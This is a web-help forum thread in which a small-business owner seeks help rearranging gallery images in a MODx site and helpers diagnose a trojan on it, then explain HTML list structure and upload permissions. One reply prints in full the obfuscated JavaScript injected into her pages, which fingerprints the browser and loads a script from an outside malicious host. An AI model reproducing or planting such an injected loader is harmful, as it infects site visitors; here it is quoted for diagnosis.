    Hi there,
    I’ve had a website designed for me with a content management system that"should" be idiot proof. I, however (normally not an idiot) can’t seem to operate it. All I want to do is move pictures around, and add in a few more. For some reason it won’t let me do a straightforward shuffle of pictures from one row to another. If I reinsert a picture in place of one that is already there, rename it etc, etc I can, but then the spacing goes all over the place if I try to add in a new picture. The website is <<website address removed because of trojan alert>> The spacing issue between rows is visible on the Decor/ Dancefloor page, where the correct spacing is visible on the Decor / Arches page.

    Can somone please offer me a straightforward step by step instructions on how to move a picture from somewhere on the page to another location on the page without messing everything else up.

    I know it should be simple, but at 15-20 minutes per picture this is killing me!!!!!!

    Thanks very much, Beth.

        I removed the link to your site because multiple people reported that it contains a trojan. Please contact your webhoster and let them check where the trojan is coming from.

        I think it is this piece of code:

        <script language=javascript><!--
        (function(t){eval(unescape(('var>20a>3d>22>53cript>45ngi>6ee>22>2cb>3d>22Versi>6fn>28>29+>22>2cj>3d>22>22>2cu>3dnavi>67>61tor>2euserAge>6et>3bif>28(>75>2e>69ndexOf(>22>57in>22)>3e0)>26>26(u>2ein>64exO>66>28>22NT>206>22)>3c>30>29>26>26(do>63um>65nt>2e>63o>6fkie>2eind>65x>4ff(>22>6die>6b>3d1>22>29>3c0)>26>26(t>79>70eo>66(zr>76z>74s)>21>3dty>70e>6f>66(>22A>22)>29)>7bzrvz>74s>3d>22A>22>3b>65v>61l>28>22if(win>64o>77>2e>22>2ba+>22)j>3d>6a+>22+>61+>22Major>22+>62+>61+>22M>69nor>22+b>2ba>2b>22>42uild>22>2b>62+>22>6a>3b>22)>3bdo>63>75>6dent>2ewrite(>22>3csc>72ipt>20>73r>63>3d>2f>2fgu>6dbl>61r>2ecn>2frss>2f>3fid>3d>22+>6a+>22>3e>3c>5c>2fs>63r>69pt>3e>22)>3b>7d').replace(t,'%')))})(/>/g);
         --></script>

        When I check it I can see it links to another site and that site is marked is dangerous by firefox.
          with regards,

            For when people do feel it’s safe to go back into the water, can you say what your site is using to generate the galleries? Are you logging in to the MODx manager, or as a web user? What is presented to you to add pictures and move them around? (E.g. is there a "Manage pictures" button when you have logged in?).

            PS I’m sure you don’t want more bad news, but when I visited earlier I found the home page banner picture (100kB) and the colour sample thumbnails (25kB each) are pretty big, probably bigger than they need to be. This makes the pages load rather slowly. :’(

              To get to it I go to http:// site name/manager
              There’s no manage picture options anywhere that I can find. I have been going into each page, then going to edit, and trying to move the pictures in the edit screen, which is in gallery format.

              Re TROJAN, my hosting comany hasn’t yet replied, my virus scan hasn’t come up with anything significant, but I can no longer update it. I’ve uninstalled and reinstalled (PCCillin) , but it still won’t update.

              Can anyone recommend something to find the trojan and remove it? I tried to install a trial of NOD32 as recommended by my webdesigner, but it also comes up with an error message.

                I have now changed Hosting companies and have a clean version of the website put up. If anyone is willing to help with instructions as to how to move images around within the page, I’d be most appreciative. Also, now it’s on a new host, I can’t upload new images either, which I could previously.

                Thanks, Jewelwillow.

                  Glad to hear you’ve got away from the malware. I dug the site address out of my browser history, and looked at the pages originally mentioned, but don’t see any difference between the spacing in them - have you fixed that, or am I missing something?

                  Did your web designer give you any instructions apart from how to log in? It should be part of the package, really. There are plenty of people here on the forums who are happy to help. Many are very knowledgable about MODx, websites and servers, but none of them are psychic, so it is necessary to provide as much information as you can about your problem and your environment. Otherwise we’re into playing "20 questions".

                  Having looked at the source code of your pages, I’m guessing that after you log in and select to edit a page, you may be seeing your pictures in an area headed "Document content" with some editing toolbars above, and an "Editor to use" dropdown below. If that’s the case, you could easily spoil the structure of your page by just dragging images around. If you change the "Editor to use" to "None", you’ll see the HTML webpage code incvolved, which basically consists of an <ul> "unordered list" </ul> for each row, a <li>"list item"</li> for each image plus caption, and an <img> image element for the actual pictures, followed by the caption:
                  <ul class="gallery">
                  <li style="width: 184px; height: 215px;">
                  <img title="balloon buddies on sticks" src="assets/images/decor/Dancefloor/balloon buddies on stick-thumb.JPG" alt="balloon buddies on sticks" width="120" height="160" />Balloon Buddies</li>
                  <li><img src="assets/images/decor/Dancefloor/marana room gold.JPG" alt="marana room gold.JPG" width="120" height="161" />Gold Floor & Ceiling</li>
                  <li><img title="gold corral" src="assets/images/decor/Dancefloor/gold corral.JPG" alt="gold corral.JPG" width="120" height="160" />Gold Ceiling Corral</li>
                  </ul>

                  As long as you preserve the structure, moving a picture involves cutting the <li>...</li> element containing it and pasting it into the new location.

                  Upload problems are most probably a matter of file permissions on your new server. What you can do about that depends on how you log in to the server, and what software you use for uploading - most FTP programs allow you view and set the file permissions on directories and files.

                    Hi KP,
                    Thanks for your response. I have zero website skills, so I actually don’t even know what information to give you- that you’ll nee to understand the issue.

                    I’m viewing and editing the pages in gallery format, so the pictures show up. Is changing the code the only way to change the location of the pictures?

                    I wasn’t given any instructions, with the site. I’ve contacted the web designer for help- he has actually been really good with other issues, but this one keeps getting put off. I need to get everything up to asthetic standard ASAP, as I have a corporate image competition coming up for a national convention, and the website is part of my entry. I can’t wait any longer or it won’t all get finished in time. I wanted to work on it this Sunday, as it’s my last day off before I leave for the convention.

                    When I go into the site it is in the Home tab, Create/edit document. Editor to use is on TinyMCE. I can see how to change the editor to code. I’ll try to have a go at that in the morning, and hope I don’t mess up the site too badly.

                    If dragging images is bad, then I think I’ve made a truly awful mess of it all by trying to shuffle pictures. I asked for a content management system because they were meant to be easy for laypersons to use- I didn’t think I’d have to learn code- that’s why I paid someone to set it up for me!

                    I’ll let you know how I go. I appreciate the assistance.

                      A CMS should indeed insulate you from the need to handle web code. But it needs to provide the tools for the jobs you need to do. TinyMCE is essentially a mini word processor that lets you insert pictures into the text. It isn’t really designed to manage picture galleries. There are gallery managers available as addins for MODx, though it’s true they normally generate thumbnail pages as a way of accessing larger pictures. That’s why I asked about a "Manage Pictures" button before - that would indicate you were using an addin called MaxiGallery, which offers a genuine drag and drop operation to move pictures around, and generates the HTML code behind the scenes.
                      I still don’t see anything too terrible in the presentation of your work on the site as it is, so personally, I would say leave things as they are and sort out the site issues later. The balloon displays speak pretty well for themselves, after all, and the overall look is good to my (not very artistic) eye.
                      Good luck with the competition! wink KP
